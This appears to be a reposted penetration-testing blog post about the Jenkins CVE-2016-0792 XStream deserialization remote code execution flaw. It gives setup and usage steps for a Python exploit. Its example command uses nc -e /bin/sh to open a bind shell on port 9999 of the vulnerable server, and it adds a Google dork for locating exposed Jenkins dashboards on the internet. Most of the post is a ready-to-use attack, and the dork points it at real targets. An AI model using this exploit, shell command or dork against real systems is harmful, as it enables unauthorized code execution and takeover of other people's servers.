Multiple unspecified API endpoints in Jenkins before 1.650 and LTS before 1.642.2 allow remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
Exploit for Jenkins serialization vulnerability – CVE-2016-0792
More information can be found here
requests library is required for this exploit to work
sudo pip install requests
git clone http://ift.tt/2vfSwAm
from exploit import exploit
Where url is url to jenkins server and command is command to execute
exploit(‘http://ift.tt/2tRLOgm’, ‘/usr/bin/nc -l -p 9999 -e /bin/sh’)
This will run nc and listen on port 9999 on vulnerable machine
For demonstration purposes I will be running ISO from Pentester Lab
Google dork: intitle: “Dashboard [Jenkins]” + “Manage Jenkins”
The post Jenkins CVE-2016-0792 Deserialization Remote Exploit appeared first on Penetration Testing.